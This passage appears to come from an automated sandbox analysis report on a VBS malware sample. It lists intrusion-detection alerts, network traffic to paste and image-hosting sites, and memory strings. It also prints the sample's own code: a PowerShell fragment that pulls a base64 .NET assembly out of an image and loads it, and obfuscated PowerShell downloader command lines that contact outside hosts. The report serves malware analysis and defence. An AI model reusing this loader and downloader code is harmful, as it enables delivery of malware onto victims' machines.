-and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method =
          Timestamp:05/23/24-18:32:53.764542
          SID:2049038
          Source Port:443
          Destination Port:49709
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/23/24-18:32:51.194154
          SID:2018856
          Source Port:443
          Destination Port:49709
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/23/24-18:32:53.213787
          SID:2025011
          Source Port:443
          Destination Port:49709
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/23/24-18:32:51.194154
          SID:2047750
          Source Port:443
          Destination Port:49709
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
          Source: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029Avira URL Cloud: Label: malware
          Source: file.vbsReversingLabs: Detection: 28%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.0% probability
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.7:49710 version: TLS 1.2

          Spreading

          barindex
          Source: Yara matchFile source: file.vbs, type: SAMPLE
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior

          Software Vulnerabilities

          barindex
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

          Networking

          barindex
          Source: TrafficSnort IDS: 2047750 ET TROJAN Base64 Encoded MZ In Image 188.114.97.3:443 -> 192.168.2.7:49709
          Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 188.114.97.3:443 -> 192.168.2.7:49709
          Source: TrafficSnort IDS: 2025011 ET TROJAN Powershell commands sent B64 2 188.114.97.3:443 -> 192.168.2.7:49709
          Source: TrafficSnort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 188.114.97.3:443 -> 192.168.2.7:49709
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.96.3 443Jump to behavior
          Source: unknownDNS query: name: paste.ee
          Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
          Source: global trafficHTTP traffic detected: GET /attachments/1235627023511191643/1235641275026243685/file.txt?ex=66351c1d&is=6633ca9d&hm=6898bd52837c3e8ebc99a889b4ac7fa8c5b601c4722aec2608343a1d6e3e0eeb& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
          Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /d/ZKQQ9 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /d/ZKQQ9 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
          Source: global trafficHTTP traffic detected: GET /attachments/1235627023511191643/1235641275026243685/file.txt?ex=66351c1d&is=6633ca9d&hm=6898bd52837c3e8ebc99a889b4ac7fa8c5b601c4722aec2608343a1d6e3e0eeb& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: paste.ee
          Source: global trafficDNS traffic detected: DNS query: uploaddeimagens.com.br
          Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 16:32:59 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=bJVpYKzXsR3lzJOYftuD26pD.X0B9PC18kiZ2MBBgPg-1716481979-1.0.1.1-VkTqXMY5ub9aiUYx0kUOPXpZrXJEnoRTFHdyQDVw8hCkcsMcv2Lpih2yeFvIxyo32Q9bB8WiwEG.i8ISa8JMhg; path=/; expires=Thu, 23-May-24 17:02:59 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XjxpXkM%2BjFcXTp6FGJKPwdEk4TwMvuB8vAE8H2Xga0NCqatxp5857Bi3iu2wYuqqXB8bmmy1kNT6BVIYFwiCDpLyv3KY66s6nhW6tmE8E3kmq1vdBAllOc9CV8SGDSDUlm7sUQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=oet8qoWqfiRZdQgqfsJb7vP8qGHbHkl.cmrVcxVxKkg-1716481979888-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 888671f63d3a4339-EWRalt-svc: h3=":443"; ma=86400
          Source: wscript.exe, 00000001.00000003.1416337095.000001FA668D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1421534739.000001FA668D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422820927.000001FA64A02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1220909605.000001FA64A1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422521039.000001FA64A50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1418152044.000001FA668C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423146490.000001FA668E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1221452637.000001FA668DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422756691.000001FA668B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422201829.000001FA64AA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1425383596.000001FA668B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422616768.000001FA64A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1221452637.000001FA668BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422883330.000001FA64A1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1221215217.000001FA668B4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1424739514.000001FA64A51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1220848499.000001FA668C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1221152356.000001FA668DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1424717306.000001FA64A4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1418152044.000001FA668D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1424152267.000001FA668B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspx
          Source: wscript.exe, 00000001.00000003.1416337095.000001FA668D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1421534739.000001FA668D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423146490.000001FA668E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1221452637.000001FA668DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1221152356.000001FA668DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1418152044.000001FA668D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspxd
          Source: powershell.exe, 00000010.00000002.1746262411.000001B010070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000010.00000002.1590353299.000001B000223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 0000000E.00000002.1877541465.00000158E1F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1590353299.000001B000001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000010.00000002.1590353299.000001B0064ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uploaddeimagens.com.br
          Source: powershell.exe, 00000010.00000002.1590353299.000001B000223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 0000000E.00000002.1877541465.00000158E1FEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1877541465.00000158E1FD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1590353299.000001B000001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: wscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
          Source: wscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
          Source: wscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
          Source: wscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
          Source: powershell.exe, 00000010.00000002.1746262411.000001B010070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000010.00000002.1746262411.000001B010070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000010.00000002.1746262411.000001B010070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: wscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
          Source: wscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
          Source: powershell.exe, 00000010.00000002.1590353299.000001B000223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: wscript.exe, 00000001.00000002.1425621780.000001FA66BAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1421763806.000001FA66BAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: powershell.exe, 00000010.00000002.1746262411.000001B010070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: wscript.exe, 00000001.00000003.1418152044.000001FA668D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423182787.000001FA64A2D000.00000004.00000020.00020000.00000000.sdmp, file.vbsString found in binary or memory: https://pastcinzal.cinzalcinzal/d/ZKQQ9
          Source: wscript.exe, 00000001.00000002.1425621780.000001FA66B8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1421763806.000001FA66B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
          Source: wscript.exe, 00000001.00000002.1425621780.000001FA66B8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1421763806.000001FA66B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/;
          Source: wscript.exe, 00000001.00000003.1421763806.000001FA66BA3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1425621780.000001FA66B8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1418152044.000001FA668C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422142977.000001FA66B71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422952198.000001FA66B79000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1421763806.000001FA66B86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1425344328.000001FA668B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1425621780.000001FA66BA3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422727575.000001FA66B78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1425596311.000001FA66B79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/ZKQQ9
          Source: wscript.exe, 00000001.00000003.1422142977.000001FA66B71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422952198.000001FA66B79000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422727575.000001FA66B78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1425596311.000001FA66B79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/ZKQQ9/m
          Source: wscript.exe, 00000001.00000003.1421763806.000001FA66BA3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1425621780.000001FA66BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/ZKQQ9U
          Source: wscript.exe, 00000001.00000003.1422883330.000001FA64A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423182787.000001FA64A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1424693017.000001FA64A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/ZKQQ9e
          Source: wscript.exe, 00000001.00000003.1421763806.000001FA66BA3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1425621780.000001FA66BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/ZKQQ9m
          Source: wscript.exe, 00000001.00000002.1425621780.000001FA66B8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1421763806.000001FA66B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/ZKQQ9ramF
          Source: wscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
          Source: wscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
          Source: powershell.exe, 00000010.00000002.1590353299.000001B000223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
          Source: powershell.exe, 00000010.00000002.1590353299.000001B000001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
          Source: wscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: wscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
          Source: wscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.7:49710 version: TLS 1.2

          System Summary

          barindex
          Source: Process Memory Space: powershell.exe PID: 1316, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 1988, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9786
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9786Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDg